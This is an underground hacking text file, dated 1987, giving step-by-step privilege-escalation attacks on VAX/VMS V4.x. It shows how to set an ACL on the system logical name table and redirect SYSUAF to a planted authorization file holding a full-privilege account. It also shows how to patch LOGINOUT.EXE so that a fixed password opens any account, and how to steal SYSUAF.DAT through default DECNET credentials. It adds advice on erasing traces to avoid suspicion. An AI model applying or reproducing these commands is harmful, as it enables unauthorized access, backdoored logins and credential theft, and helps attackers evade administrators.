UnderGround Information





1.  To get SYSNAM privilege under V4.2 do the following:-



$ SET ACL/OBJ=LOGICAL/ACL=(ID=[???,???],ACCESS=READ+WRITE+DELETE+CONTROL)
      LNM$SYSTEM_TABLE



etc. on all there tables that you need access to.  The problem with VMS is
that it allows ACLs on logical name tables, but anyone can put them on!
[???,???] is your UIC.

 Or if you have another method of gaining SYSNAM priv you can do the 
following..

Now that you have this ACL, you should be able to add an entry for SYSUAF,
you need the executor mode name, eg:



$ DEFINE/SYSTEM/EXEC SYSUAF $1$DISK1:[FRED]SYSUAF

If you have done a SET DEFAULT to [FRED] before hand and done this:

$ COPY SYS$SYSTEM:SYSUAF.DAT *

then you should be able to do:

$ RUN SYS$SYSTEM:AUTHORIZE

UAF>ADD FRED/PASS=FRED/PRIV=ALL/FLAG=NODISUSER

UAF>^Z

*EXIT*

 You should now note that ANYONE logging onto the system will be checked
against the SYSUAF file in the [FRED] directory and NOT the SYS$SYSTEM 
directory.. also anyone doing a SHOW LOGICAL will see a new entry in the 
system name table.. ie. "SYSUAF" = SYS$SYSDEVICE:[FRED]SYSUAF

Its now all ready to test..
Try:

$ SET HOST 0

Username: FRED
Password: FRED

And hey presto.. your logged in with FULL privileges..

As entering an entry into the System logical table is a bit of a mass 
giveaway of who is hacking the system it is a good idea to copy the sysuaf
file from the system direcxtory, and ALTERING your OWN account to have
full privs, doing this doesnt cause suspicsion if a new USERNAME appears.

So write a DCL command procedure that will:
A. Get SYSNAM priv
B. Enter the new logical name into the system table
C. Login

and write a routine that is called from your login.com file that does:

A. Checks for the SYSUAF entry in the system table
B. Deletes it if it is present.

Doing this will make the new definition for SYSUAF only appear for a fract-
ion of a second and will be very dificult to trace..

You should now be logged into your own account with FULL privs.. magic
really.. (I have tested this method and it works really well!)


2.   Another approach (or extension to the last method) by  getting  write
     access to LOGINOUT.EXE in SYS$SYSTEM is the following patch:

$SET DEFAULT SYS$SYSTEM:
$PATCH LOGINOUT

PATCH>REPALCE/INSTRUCTION 9D14

OLD>'MOVAB B^20(SP),B^1C(SP)'
OLD>EXIT
NEW>'CMPL B^20(SP),#41414141'
NEW>'BNEQ LBL'
NEW>'MOVL I^#1,R0'
NEW>'RET'
NEW>'LBL: MOVAB B^20(SP),B^1C(SP)'
NEW>EXIT
PATCH>UPDATE

$ INSTALL/REPLACE LOGINOUT.EXE
$ PURGE LOGINOUT.EXE

Then try logging in:

Username: SYSTEM
Password: AAAA

or

Username: ANY_ONE_WHO_EXISTS_ON_THIS_SYSTEM
Password: AAAA

This works for V4.2 and V4.3, probably V4.1 as well, check if the MOVAB is
at 9D14 with EXAMIN/INSTRUCTION.

3. On most machines you will find the following also works, (useful for 
   accessing protected files..)

  To say copy the SYSUAF.DAT file to your own directory try:

 $ COPY NODE"DECNET DECNET"::SYS$SYSTEM:SYSUAF.DAT *.*

 Where NODE is your local node name (machine name, can be found by doing
 SHOW NETWORK, the current node is the top one in the list)
 If the above doesnt work then try removing the second DECNET within the 
 quotes.
 The two words within the quotes are firstly the username and secondly the
 password of an account that has NETWORK access, DECNET is likely to have
 full access on most machines.

          These hacks are copyright of Lightfinger.     (c) 1987